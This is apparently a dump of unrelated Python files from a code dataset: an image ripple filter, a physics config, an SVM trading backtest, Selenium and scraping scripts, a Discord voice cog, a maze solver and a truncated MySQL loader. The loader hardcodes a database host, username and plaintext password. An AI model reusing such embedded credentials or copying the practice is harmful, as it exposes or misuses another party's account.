dtype=\"uint8\")\n\n# define wave parameters\nwavelength = 20\namplitude = 30\nphase = math.pi / 4\n\n# get the center point\ncentreX = 0.5\ncentreY = 0.5\nradius = min(rows, cols) / 2\n\n# set wave cover area\nicentreX = cols * centreX\nicentreY = rows * centreY\n\n# wave effects\nfor i in range(rows):\n for j in range(cols):\n dx = j - icentreX\n dy = i - icentreY\n distance = dx * dx + dy * dy\n\n if distance > radius * radius:\n x = j\n y = i\n else:\n # calculate wave area\n distance = math.sqrt(distance)\n amount = amplitude * math.sin(distance / wavelength * 2 * math.pi - phase)\n amount = amount * (radius - distance) / radius\n amount = amount * wavelength / (distance + 0.0001)\n x = j + dx * amount\n y = i + dy * amount\n\n # border judgement\n if x < 0:\n x = 0\n if x >= cols - 1:\n x = cols - 2\n if y < 0:\n y = 0\n if y >= rows - 1:\n y = rows - 2\n\n p = x - int(x)\n q = y - int(y)\n\n # wave assignment\n dst[i, j, :] = (1 - p) * (1 - q) * img[int(y), int(x), :] + p * (1 - q) * img[int(y), int(x), :]\n + (1 - p) * q * img[int(y), int(x), :] + p * q * img[int(y), int(x), :]\n\n# show image\ncv2.imshow('src', img)\ncv2.imshow('dst', dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"image_Light ripple/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"169924467","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"TEST\")\nprocess.source = cms.Source(\"EmptyIOVSource\",\n lastValue = cms.uint64(100),\n timetype = cms.string('Lumi'),\n firstValue = cms.uint64(11),\n interval = cms.uint64(11)\n)\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n cerr = cms.untracked.PSet(\n enable = cms.untracked.bool(False)\n ),\n cout = cms.untracked.PSet(\n enable = cms.untracked.bool(True),\n threshold = cms.untracked.string('DEBUG')\n )\n)\n\nprocess.OnlineDBOutputService = cms.Service(\"OnlineDBOutputService\",\n DBParameters = cms.PSet(\n messageLevel = cms.untracked.int32(2),\n authenticationPath = cms.untracked.string('.')\n ),\n jobName = 
cms.untracked.string(\"TestLumiBasedUpdate\"),\n autoCommit = cms.untracked.bool(True),\n connect = cms.string('sqlite_file:test_lumi.db'),\n preLoadConnectionString = cms.untracked.string('sqlite_file:test_lumi.db'),\n #omsServiceUrl = cms.untracked.string('http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection'),\n #lastLumiFile = cms.untracked.string('lastLumi.txt'),\n toPut = cms.VPSet(cms.PSet(\n record = cms.string('PedestalsRcd'),\n tag = cms.string('mytest'),\n timetype = cms.untracked.string('Lumi'),\n onlyAppendUpdatePolicy = cms.untracked.bool(True)\n ))\n)\n\nprocess.mytest = cms.EDAnalyzer(\"LumiBasedUpdateAnalyzer\",\n record = cms.string('PedestalsRcd'),\n lastLumiFile = cms.untracked.string('lastLumi.txt')\n #omsServiceUrl = cms.untracked.string('http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection')\n)\n\nprocess.p = cms.Path(process.mytest)\n\n\n\n","sub_path":"CondCore/DBOutputService/test/python/testLumiBasedUpdateAnalyzer_cfg.py","file_name":"testLumiBasedUpdateAnalyzer_cfg.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"381845535","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 29 09:07:02 2017\r\n\r\nSigo probando combinación de variables.\r\nCorré bien con Kernel='rbf', con el resto no corre (sigmoid termina sin valor)\r\n\r\nProbé agregando un MA a 50 días, pero empeora cuando se combina con MA210\r\n\r\n@author: bruno\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import preprocessing, model_selection, svm\r\nimport PCA1\r\nfixc=0.0#8\r\nprop=0.00#1\r\n\r\n#Leo, elimino columnas que no necesito y completo las mensuales\r\ndf = pd.read_csv('InputData.csv',index_col='DATE')\r\n#df['ret1d'] = np.log(df.SP_LAST) - np.log(df.SP_LAST.shift(1))\r\ndf.drop(df.index[0:19], inplace=True)\r\ndf.drop(['ICJ','MVOLNU'], 1, inplace=True)\r\nmonthdf=df[['DG_Ord','DG_Ship','ShortInt','CAPE','CPI']].copy()\r\nmonthdf= monthdf.fillna(method='pad')\r\ndf.drop(['DG_Ord','DG_Ship','ShortInt','CAPE','CPI'], 1, inplace=True)\r\ndf= pd.concat([df, monthdf], axis=1)\r\n\r\n#elijo cantidad de meses, defino el \"Label\" a pronosticar y elimino las últimas filas\r\nModel=3 #Meses a pronosticar\r\nshift=Model*21\r\ndf['retModel'] = np.log(df.SP_LAST.shift(-shift)) - np.log(df.SP_LAST)\r\ndf['label'] = np.sign(df.retModel)\r\ndf.drop(df.index[-shift:], inplace=True)\r\n\r\n#Ajusto variables para que tengan mejor sentido económico\r\ndf['DP'] = np.log(df['SPYDPS']) - np.log(df['SPY'])\r\n\r\nXpca=df[['DP','PE','BM','CAPE']].copy()\r\nproj=PCA1.Principal(Xpca)\r\ndf['PCAPrice']= proj*(-1)\r\n\r\n#fechas=df[[]].copy() #Arreglar esto en algun momento asi no hay que calcular en Excel\r\n#df['SIM']=PCA1.Simm(fechas)\r\n\r\newma=df.USGG10YR.ewm(span=252,adjust=True).mean()\r\ndf['BY']= df['USGG10YR']/ewma\r\ndf['DEF'] = df['BAA_Yield'] - df['AAA_Yield']\r\ndf['TERM'] = df['USGG10YR'] - df['USGG3M']\r\ndf['VRP'] = df['VIX'] #- df['VESTIM']\r\ndf['NOS'] = np.log(df['DG_Ord']) - np.log(df['DG_Ship'])\r\ndf['PCR'] = np.log(df['SPY']) - np.log(df['GSCI'])\r\nwind=210\r\nwind2=50\r\ndf['MA'] = df['SP_LAST'].rolling(window=wind,min_periods=None).mean()\r\ndf['MA2'] = df['SP_LAST'].rolling(window=wind2,min_periods=None).mean()\r\ndf['OIL'] = df['CL1'] - df['CL4'].shift(63)\r\ndf['SI'] = df['ShortInt']/df['NYAVOL'].rolling(window=21,min_periods=None).mean()\r\ndf.drop(df.index[:wind-1], 
inplace=True)\r\n#df[['NYAVOL','MAVol']].plot()\r\n\r\n#falta calcular Cay, VarianceStimator y PCA_Tech.\r\n#Revisar calculo de SI. Combina diario y mensual\r\n\r\n#df = df[['PCAPrice','BY', 'DEF', 'TERM', 'SIM','VRP','NOS', \r\n# 'CPI', 'PCR', 'MA', 'OIL','SI','label']]\r\n\r\n#col=['PCAPrice','BY', 'DEF', 'TERM', 'SIM','BDI','VRP','NOS','CPI', 'PCR', 'MA', 'OIL','SI']\r\n#col=['PCAPrice','BY', 'DEF', 'TERM', 'NOS','CPI', 'PCR', 'MA','SI','label']\r\n\r\ncol=['MA','CPI','label']\r\n\r\ndf2=df.copy()\r\n\r\ndf=df2[col].copy()\r\ndf= df.fillna(-99999)\r\ndf.to_csv('out.csv', sep=',')\r\n\r\nX = np.array(df.drop(['label'], 1))\r\ny = np.array(df['label'])\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.25)\r\n\r\nclf = svm.SVC(kernel=\"rbf\")\r\nclf.fit(X_train, y_train)\r\nconfidence = clf.score(X_test, y_test)\r\nprediction=clf.predict(X_test)\r\npred=pd.DataFrame(prediction,columns=['Pred'])\r\nprint(confidence)\r\n\r\nMaxLong=2\r\nMaxShort=1\r\n\r\nevol = df2[['SP_LAST']][-len(pred):]\r\npred.set_index(evol.index.values,inplace=True)\r\nevol = pd.concat([evol, pred], axis=1)\r\n#evol['B&H']= np.log(evol.SP_LAST) - np.log(evol.SP_LAST.shift(1))\r\n\r\nMoney0=evol['SP_LAST'][0]*(1+prop)+fixc\r\nevol['S&P']= evol.SP_LAST/Money0\r\nevol['Money']=0.0\r\nevol['Cant']=0.0\r\n\r\nMoney0=evol['SP_LAST'][0]*(1+prop)+fixc\r\n\r\nn=1 #cantidad que compro en cada decisión\r\nstep=21\r\n#paso inicial\r\nif evol['Pred'][0]==1:\r\n evol['Cant'][0]=1\r\n evol['Money'][0]=Money0-n*evol['SP_LAST'][0]*(1+prop)-fixc\r\nif evol['Pred'][0]==-1:\r\n evol['Cant'][0]=-1\r\n evol['Money'][0]=Money0+n*evol['SP_LAST'][0]*(1-prop)-fixc\r\n \r\nfor i in range(1,len(pred)): \r\n if evol['Pred'][i]==1 and evol['Cant'][i-1]<=MaxLong-1 and i%step == 0 :\r\n evol['Cant'][i]=evol['Cant'][i-1]+1\r\n evol['Money'][i]=evol['Money'][i-1]-n*evol['SP_LAST'][i]*(1+prop)-fixc\r\n elif evol['Pred'][i]==-1 and evol['Cant'][i-1]>=MaxShort-1 and i%step == 0 :\r\n evol['Cant'][i]=evol['Cant'][i-1]-1\r\n evol['Money'][i]=evol['Money'][i-1]+n*evol['SP_LAST'][i]*(1-prop)-fixc \r\n else:\r\n evol['Cant'][i]=evol['Cant'][i-1]\r\n evol['Money'][i]=evol['Money'][i-1]\r\n \r\nevol['Port']=evol['Money']+evol['Cant']*evol['SP_LAST']\r\nevol['SVM']=evol.Port/Money0\r\n#print(evol) \r\n\r\nevol[['S&P','SVM']].plot()\r\n\r\n \r\n#with pd.option_context('display.max_rows', None, 'display.max_columns', 3):\r\n# print(df.label)\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nexample_measures = np.array([[4,2,1,1,1,2,3,2,1]])\r\nexample_measures = example_measures.reshape(len(example_measures), -1)\r\nprediction = clf.predict(example_measures)\r\nprint(prediction)\r\n\"\"\"\r\n","sub_path":"svm_2017_09_29.py","file_name":"svm_2017_09_29.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"542798969","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time;\n#C_TC3: We are using the Google Chrome browser to launch our app and obtain a Validating if the number of response of the API is matching the dynamically populated records.\ndriver= webdriver.Chrome(\"/home/antony/Desktop/Irish Rail Microservice Testing/chromedriver\")\ndriver.get(\"http://localhost/ASE-Rail/index.php\")\ndriver.maximize_window();\ntime.sleep(3) \ndriver.save_screenshot(\"./Screenshot/C_TC3: Step-1.png\")\nmy_list = []\ntry:\n\tfor x in 
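# [illustrative sketch -- same locators as the loop below, without the 100-row cap]
# the loop that follows probes rows one XPath at a time and relies on the broad
# except to stop at the first missing row; an equivalent bulk query would be:
#     rows = driver.find_elements_by_xpath("/html/body/div/center/table/tbody/tr")
#     my_list = [r.find_element_by_xpath("./td[1]").text for r in rows[1:]]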
range(100):\n\t\th=str(x+2)\n\t\tstr1=\"/html/body/div/center/table/tbody/tr[\"+h+\"]/td[1]\"\n\t\te = driver.find_element_by_xpath(str1)\n\t\tmy_list.append(e.text)\n\nexcept:\n\tprint(\"An exception occurred:Out of range\")\n\nprint(\"responses from API: \",my_list,\"\\n\")\nprint(\"Total number of responses from API= \",len(my_list))\nif (str(len(my_list)) in driver.page_source):\n\tprint(\"Response Matched\")\n\nelse:\n\tprint(\"Response not Matched\")\n\n\n","sub_path":"testing/Irish Rail Microservice Testing/C_TC3/C_TC3.py","file_name":"C_TC3.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266150060","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# *\n# * Created by PyCharm.\n# * User: qixu\n# * Date:2018/11/13\n# * Time: 13:53\n# *\nimport time, requests,random\nfrom pyquery import PyQuery as pq\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\na = 'src=\"//club2.autoimg.cn/album/g28/M07/07/00/userphotos/2018/11/05/22/500_ChcCR1vgTqGABCXLAAHapIlRdNA092.jpg\"'\nprint(a.split('_')[1][:-5])\nexit()\ndef getUrls(page):\n url = \"https://club.autohome.com.cn/JingXuan/104/\" + str(page)\n res = requests.get(url)\n if res.status_code == 200:\n text = pq(res.text)\n text = text('.content p a').items()\n for item in text:\n urltemp = 'https:' + item.attr.href\n with open('urls.txt', 'a+') as f:\n f.write(urltemp + '\\n')\n\n'''\n获取图片地址,存入imgs.txt中\n'''\ndef getImgs(url):\n broswer = webdriver.Chrome()\n broswer.get(url)\n # 获取图片\n time.sleep(5)\n title = broswer.find_element_by_css_selector('.maxtitle').text\n i = broswer.find_elements_by_css_selector('.tz-figure .x-loaded img')\n for item in i:\n with open('imgs.txt', 'a+') as f:\n f.write(item.get_attribute('src') + '\\n')\n res = requests.get(item.get_attribute('src'))\n if res.status_code == 200:\n with open('./imgs/' + str(i) + '.jpg', 'wb') as f1:\n f1.write(res.content)\n time.sleep(random.randint(4,8))\n time.sleep(random.randint(6,15))\n broswer.close()\n\n\ndef imgs():\n i = 0\n with open('imgs.txt', 'r') as f:\n for item in f:\n i = i + 1\n if not item.startswith('http'):\n continue\n res = requests.get(item)\n if res.status_code == 200:\n with open('./imgs/' + str(i) + '.jpg', 'wb') as f1:\n f1.write(res.content)\n time.sleep(15)\n\nif __name__ == '__main__':\n # for i in range(1,28):\n # getUrls(i)\n # time.sleep(3)\n num = 1\n with open('urls.txt', 'r') as f:\n for item in f:\n print('正在获取第{0}个帖子'.format(num))\n getImgs(item)\n time.sleep(random.randint(7,10))\n num = num +1\n # imgs()\n\n","sub_path":"实例/汽车之家.py","file_name":"汽车之家.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"433059220","text":"from DecisionTree import DecisionTree, DisplayTree, Testing\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nglobal root\r\n\r\nIrreleventClasses=[]\r\nDataset = input(\"Enter Name of Dataset File: \") \r\nTargetClass = input(\"Enter Name of Target Class: \")\r\nn = int(input(\"Enter number of Irrelevent Classes: \")) \r\nfor i in range(0, n): \r\n element = input('Enter Irrelevent Class: ') \r\n IrreleventClasses.append(element) \r\n \r\n\r\nfulldata = 
pd.read_csv(Dataset)\r\nTrainingData,Test=train_test_split(fulldata, test_size=0.2, random_state=42)\r\n\r\n \r\nroot=DecisionTree(TrainingData, TargetClass, IrreleventClasses)\r\nprint(root.label)\r\n\r\nDisplayTree(root)\r\n\r\nTesting(Test,root)\r\n","sub_path":"DecisionTree-main/DecisionTreeMain.py","file_name":"DecisionTreeMain.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115717933","text":"'''\nConstants & Hyperparameters\n'''\n#add an experiment ID with the timestamp in order to catalog each experiment\n#id=1\n\nimage_size = 28\nnum_labels = 10\nnum_channels = 1 # grayscale\nbatch_size = 16\n\n#the following included to bridge RNN and LeNet Code with diff variable names\ninput_size = image_size**2\nnum_classes = num_labels\nstate_size = 2000\nnum_batches = 2000\n#where 1 = target, 2 = distractor, 3 = blank\ntemporal_order = [1,3]\n#the number of timesteps that the input data will be shown\nnum_steps = len(temporal_order)\n#the total number of timesteps for which an image will be shown\nnum_timesteps = 1\nimage_size = 28\npatch_size = 5\n\n\nimage_size = 28\n\n\nkernelSize = 5\ndepth1Size = 6\ndepth2Size = 16\nnum_channels = 1\n\npadding=\"SAME\"\nconvStride = 1\npoolStride = 2\npoolFilterSize = 2\n\nFC1HiddenUnit = 360\nFC2HiddenUnit = 784\n\nlearningRate=1e-4\n\n","sub_path":"Constants_HyperPara.py","file_name":"Constants_HyperPara.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"93050061","text":"import discord.ext.commands as commands\nimport libs.utilities as utilities\nimport typing as t\nimport pathlib\nimport discord\nimport model\n\nclass Voice(commands.Cog):\n \"\"\"Houses the voice client for Bakerbot. Audio commands can be found here.\"\"\"\n def __init__(self, bot: model.Bakerbot) -> None:\n self.bot = bot\n\n def cog_unload(self) -> None:\n \"\"\"Ensures a clean disconnect from any voice clients on unload.\"\"\"\n for client in self.bot.voice_clients:\n coro = self.cog_unload_disconnect(client)\n self.bot.loop.create_task(coro)\n\n async def cog_unload_disconnect(self, client: discord.VoiceClient) -> None:\n \"\"\"Asynchronous unloading task for disconnecting voice clients.\"\"\"\n await client.disconnect()\n\n async def connect(self, channel: discord.VoiceChannel) -> None:\n \"\"\"Either connects or moves the bot to a specific voice channel.\"\"\"\n client = channel.guild.voice_client\n offline = client is None or not client.is_connected()\n function = channel.connect() if offline else client.move_to(channel)\n await function\n\n async def ensure_client(self, remote: t.Optional[discord.VoiceClient]) -> bool:\n \"\"\"Returns the state of the voice client after attempting a connection.\"\"\"\n if remote is None or remote.channel is None:\n return False\n\n await self.connect(remote.channel)\n return True\n\n @commands.group(invoke_without_subcommand=True)\n async def vc(self, ctx: commands.Context) -> None:\n \"\"\"The parent command for voice client management.\"\"\"\n if ctx.invoked_subcommand is None:\n if ctx.subcommand_passed is None:\n # There is no subcommand: inform the user about voice clients.\n summary = \"\"\"Hi! 
Welcome to Bakerbot's voice client command group.\n This cog houses commands related to audio.\n See `$help voice` for a full list of available subcommands.\"\"\"\n\n embed = utilities.Embeds.standard()\n embed.description = summary\n embed.set_footer(text=\"Dunno what to put here.\", icon_url=utilities.Icons.info)\n await ctx.reply(embed=embed)\n else:\n # The subcommand was not valid: throw a fit.\n command = f\"${ctx.command.name} {ctx.subcommand_passed}\"\n summary = f\"`{command}` is not a valid command.\"\n footer = \"Try $help voice for a full list of available subcommands.\"\n embed = utilities.Embeds.status(False, summary)\n embed.set_footer(text=footer, icon_url=utilities.Icons.cross)\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def upload(self, ctx: commands.Context) -> None:\n \"\"\"Uploads a file to Bakerbot's music repository.\"\"\"\n embed = utilities.Embeds.status(True, None)\n saved = 0\n\n async with ctx.typing():\n for attachment in ctx.message.attachments:\n filepath = f\"music/{attachment.filename}\"\n if pathlib.Path(filepath).is_file():\n await attachment.save(filepath)\n saved += 1\n\n embed.description = f\"Uploaded {saved} files!\"\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def play(self, ctx: commands.Context, track: t.Optional[str]) -> None:\n \"\"\"Plays audio tracks from the music folder.\"\"\"\n if track is None:\n paginator = utilities.Paginator()\n paginator.placeholder = \"Tracks\"\n\n for track in pathlib.Path(\"music\").iterdir():\n label = f\"{track.name[0:22]}...\" if len(track.name) > 25 else track.name\n option = discord.SelectOption(label=label, value=track.name, description=str(track))\n paginator.add(option)\n\n await ctx.reply(\"Please select a track from the dropdown menu.\", view=paginator)\n track = await paginator.wait()\n if track is None:\n return\n\n filepath = pathlib.Path(f\"music/{track}\")\n if not filepath.is_file():\n fail = utilities.Embeds.status(False, f\"{track} is not a valid track.\")\n return await ctx.reply(embed=fail)\n\n if not (await self.ensure_client(ctx.author.voice)):\n fail = utilities.Embeds.status(False, \"Unable to join a channel.\")\n return await ctx.reply(embed=fail)\n\n track = await discord.FFmpegOpusAudio.from_probe(filepath)\n embed = utilities.Embeds.standard()\n embed.set_footer(text=\"Interaction complete.\", icon_url=utilities.Icons.info)\n embed.description = f\"Now playing `{filepath}`.\"\n\n if ctx.voice_client.is_playing() or ctx.voice_client.is_paused():\n ctx.voice_client.stop()\n\n ctx.voice_client.play(track)\n await ctx.reply(embed=embed)\n\n @vc.command()\n async def join(self, ctx: commands.Context, *, channel: t.Optional[discord.VoiceChannel]) -> None:\n \"\"\"Joins the voice channel that the invoker is in, or `channel` if specified.\"\"\"\n channel = channel or getattr(ctx.author.voice, \"channel\", None)\n\n if channel is None:\n response = \"No available channels exist (either none specified or you aren't in one).\"\n fail = utilities.Embeds.status(False, response)\n return await ctx.reply(embed=fail)\n\n await self.connect(channel)\n\n @vc.command()\n async def leave(self, ctx: commands.Context) -> None:\n \"\"\"Disconnects the bot from any guild voice channels.\"\"\"\n vc = ctx.guild.voice_client\n if vc is not None and vc.is_connected():\n await vc.disconnect()\n\ndef setup(bot: model.Bakerbot) -> None:\n cog = Voice(bot)\n 
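    # [illustrative sketch -- the extension path "cogs.voice" is an assumption]
    # setup() is the discord.py extension hook; the hosting bot would register
    # this cog with something like:
    #     bot.load_extension("cogs.voice")   # imports the module, then calls setup(bot)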
bot.add_cog(cog)\n","sub_path":"cogs/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"312372150","text":"from Component import * \n\nclass Timezone(Component):\n\tDescription=''\n\t_attributes=[]\n\t_attributes_value={}\n\t_items=[]\t\t\n\t_methods=[]\n\tX=0\n\tY=0\n\t\n\n\tdef __init__(self):\n\t\tself.Description='This Component Shows Timezone'\n\t\tself._attributes=[('X','int'),('Y','int')]\t\t\n\t\tself._attributes_value={'X':0,'Y':0}\t\t\n\t\tself._methods=[('getPage','Change current page')]\n\n\n\tdef getPage(self):\n\t\treturn \"Page is changed\"\n\n","sub_path":"ceng445_softwareDevelopmentWithScriptingLanguages/phase4/mysite/Timezone.py","file_name":"Timezone.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117526054","text":"# added this comment\n\nimport sys\n\nclass Point:\n \"\"\" Represent a two-dimensional point\n x - horizontal position\n y - vertical position\n \"\"\"\n\n def __init__(self, x, y):\n \"\"\" Initialize a new point\n \"\"\"\n self.x, self.y = int(x), int(y)\n\n def __str__(self):\n \"\"\" Return a string representation of self\n \"\"\"\n return \"({}, {})\".format(self.x, self.y)\n\n def __repr__(self):\n \"\"\"\n Return a string that would evaluate to a Point equivalent to self\n \"\"\"\n return \"Point({}, {})\".format(self.x, self.y)\n\n def step(self, other, step):\n \"\"\" Apply the step size to a given point and return the new neighbour\n \"\"\"\n return Point(self.x + (other.x * step), self.y + (other.y * step))\n\n\nclass Queue:\n def __init__(self):\n self.items = []\n def isEmpty(self):\n return self.items == []\n def enqueue(self, item):\n self.items.insert(0,item)\n def dequeue(self):\n return self.items.pop()\n def size(self):\n return len(self.items)\n\nif __name__ == '__main__':\n\n # You do NOT need to include any error checking.\n # I found this particular check personally helpful, when I forgot to provide a filename.\n if len(sys.argv) != 2:\n print(\"Usage: python3 Alice.py \")\n sys.exit()\n\n # Here is how you open a file whose name is given as the first argument\n f = open(sys.argv[1])\n\n d = {}\n step = 1\n\n for line in f:\n line = line.strip()\n content = line.split(\",\")\n initial_point = content[0].split(\".\")\n d[Point(int(initial_point[0]), int(initial_point[1])).__str__()] = content[1:]\n d[Point(int(initial_point[0]), int(initial_point[1])).__str__()].append(Point(int(initial_point[0]), int(initial_point[1])))\n\n start = None\n for i in d:\n\n # determine the starting\n if d[i][0] == 'START':\n start = i\n\n if (d[i][0] != 'GOAL'):\n # split all the neighbour vectors into a list\n d[i][1] = d[i][1].split(\"|\")\n else:\n goal = i\n\n # convert all neighbour vectors into Point objects\n for j in range(len(d[i][1])):\n vector = d[i][1][j].split(\".\")\n d[i][1][j] = Point(int(vector[0]), int(vector[1]))\n\n d[i][-2] = int(d[i][-2])\n d[i][-4] = None\n\n\n maze_size = int(len(d) ** 0.5)\n\n print(d)\n print(maze_size)\n\n adj_list = {}\n temp = step\n\n while (temp != maze_size):\n inner = {}\n\n for i in d:\n lst = []\n for j in range(len(d[i][1])):\n\n lst.append(d[i][-1].step(d[i][1][j], temp))\n\n inner[i] = lst\n adj_list[temp] = inner\n\n temp += 1\n print(adj_list)\n\n # initialize queue with start\n step = 1\n failed = 0\n q = Queue()\n q.enqueue(start)\n\n # begin the BFS loop\n while 
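    # [illustrative sketch -- collections.deque as a drop-in for the Queue class above]
    # Queue.enqueue uses list.insert(0, item), which costs O(n) per push; a deque
    # keeps the same FIFO order with O(1) operations at both ends:
    #     from collections import deque
    #     q = deque(); q.appendleft(item); item = q.pop()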
q.isEmpty() != True:\n u = q.dequeue()\n\n if (d[u.__str__()][0] == 'RED'):\n step += 1\n elif (d[u.__str__()][0] == 'YELLOW'):\n step -= 1\n\n if (step == maze_size or step == 0 or failed == 1):\n failed = 1\n break\n\n for i in adj_list[step][u.__str__()]:\n try:\n if d[i.__str__()][3] == 'white':\n\n # change the colour\n d[i.__str__()][3] = 'grey'\n\n # update the parent\n d[i.__str__()][2] = u\n\n # increase the distance\n d[i.__str__()][4] = d[d[i.__str__()][2].__str__()][4] + 1\n\n q.enqueue(i)\n except(KeyError):\n failed = 1\n break\n d[u.__str__()][3] = 'black'\n\n if (failed == 1):\n print(\"No sol\")\n else:\n # print path here\n last = []\n dist = d[goal][4]\n last.append(d[goal][-1])\n while d[goal][2] is not None:\n last.append(d[goal][2])\n goal = str(d[goal][2])\n print(last)\n print(dist)\n\n\n\n","sub_path":"Alice.py","file_name":"Alice.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"488884260","text":"'''\nCreated on 2015-03-27\n\n@author: Moskalyk\n'''\nfrom __future__ import print_function\nimport MySQLdb\nimport csv\n#TODO: Output Graphical representation of data \n\n#Reading in CSV File\ntry:\n raw_data = open('cleaned_data.csv', 'r').read().split('\\r')\nexcept:\n print('File not found')\n\n################## DATABASE ######################\n#Connecting to the SQL Database\ntry:\n db = MySQLdb.connect(host=\"sql3.freemysqlhosting.net\", # hostname\n user=\"sql372028\", # username\n passwd=\"lZ2%fG4!\", # password\n db=\"sql372028\") # database\n cur = db.cursor()\nexcept:\n print('Could not connect to database') \n \n\n# # cur.execute(\"DROP TABLE IF EXISTS TestTable\")\n\ncur.execute(\"DROP TABLE IF EXISTS RESPONSE\")\ncur.execute(\"DROP TABLE IF EXISTS LEADERITE\")\n\n\n# Create table as per requirement\nsql_create_table_1 = \"\"\"CREATE TABLE LEADERITE(\n ID INTEGER NOT NULL,\n FIRST_NAME VARCHAR(20),\n LAST_NAME VARCHAR(20),\n SITE_NAME VARCHAR(50),\n PRIMARY KEY(ID)\n )\"\"\"\n# \nsql_create_table_2 = \"\"\"CREATE TABLE RESPONSE(\n RESPONSE_ID INTEGER AUTO_INCREMENT NOT NULL,\n LEADERITE_ID INTEGER NOT NULL,\n WELL_PREPARED INTEGER,\n ENJOYED_CASE INTEGER,\n CASE_TAUGHT VARCHAR(50),\n PACE_OF_CLASS INTEGER,\n KEY_LEARNING_POINTS INTEGER,\n STIMULATES_DISCUSSION INTEGER,\n Q_A INTEGER,\n TIME_EFFECTIVENESS INTEGER,\n OPINIONS_OF_CLASS INTEGER,\n TEACHING_STRENGTHS VARCHAR(500),\n CASE_STRENGTHS VARCHAR(500),\n NEW_IDEAS VARCHAR(500),\n TEACHING_IMPROVEMENTS VARCHAR(500),\n PRIMARY KEY(RESPONSE_ID),\n FOREIGN KEY (LEADERITE_ID) REFERENCES LEADERITE(ID)\n )\"\"\"\n \n#\ncur.execute(sql_create_table_1)\ncur.execute(sql_create_table_2)\n\n#Defining the insert function\ndef insertIntoLEADERTable(entry):\n LEADERITE_ID = int(entry)\n cur.execute(\"\"\"INSERT INTO LEADERITE (id) VALUES (%s)\"\"\", (LEADERITE_ID))\n \ndef insertIntoRESPONSETable(entry):\n LEADERITE_ID = int (entry[0][0])\n WELL_PREPARED = int(entry[0][2])\n ENJOYED_CASE = int(entry[1][2])\n CASE_TAUGHT = entry[2][2]\n PACE_OF_CLASS = int(entry[3][2])\n KEY_LEARNING_POINTS = int(entry[4][2])\n STIMULATES_DISCUSSION= int(entry[5][2]) \n Q_A = entry[6][2]\n TIME_EFFECTIVENESS = int(entry[7][2])\n OPINIONS_OF_CLASS = entry[8][2]\n TEACHING_STRENGTHS = entry[9][2]\n CASE_STRENGTHS = entry[10][2]\n NEW_IDEAS = entry[11][2]\n TEACHING_IMPROVEMENTS = entry[12][2]\n \n cur.execute(\"\"\"INSERT INTO RESPONSE ( LEADERITE_ID,\n WELL_PREPARED,\n ENJOYED_CASE,\n CASE_TAUGHT,\n PACE_OF_CLASS,\n KEY_LEARNING_POINTS,\n 
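    # [illustrative sketch -- refers to insertIntoLEADERTable defined above]
    # MySQLdb tolerates a bare scalar there, but the DB-API-portable form passes
    # the parameters as a one-element tuple:
    #     cur.execute("INSERT INTO LEADERITE (id) VALUES (%s)", (LEADERITE_ID,))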
STIMULATES_DISCUSSION,\n Q_A,\n TIME_EFFECTIVENESS,\n OPINIONS_OF_CLASS,\n TEACHING_STRENGTHS,\n CASE_STRENGTHS,\n NEW_IDEAS,\n TEACHING_IMPROVEMENTS) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\", (LEADERITE_ID,\n WELL_PREPARED,\n ENJOYED_CASE,\n CASE_TAUGHT,\n PACE_OF_CLASS,\n KEY_LEARNING_POINTS,\n STIMULATES_DISCUSSION,\n Q_A,\n TIME_EFFECTIVENESS,\n OPINIONS_OF_CLASS,\n TEACHING_STRENGTHS,\n CASE_STRENGTHS,\n NEW_IDEAS,\n TEACHING_IMPROVEMENTS))\n\n################## CLEANING DATA ######################\n \nfull_data = []\n\nfor row in raw_data:\n split_row = row.split(\",\")\n full_data.append(split_row)\n \n#Unique Leader Cleaning\nleader_ids = []\n\nfor row in full_data:\n if row[0] not in leader_ids and len(row[0]) < 5 and row[0] is not '':\n leader_ids.append(row[0])\n\n#sorting data\nleader_ids.sort()\nfull_data.sort()\n\n\n#Inserting Leader ids into LEADERITE Table\nfor entry in leader_ids:\n 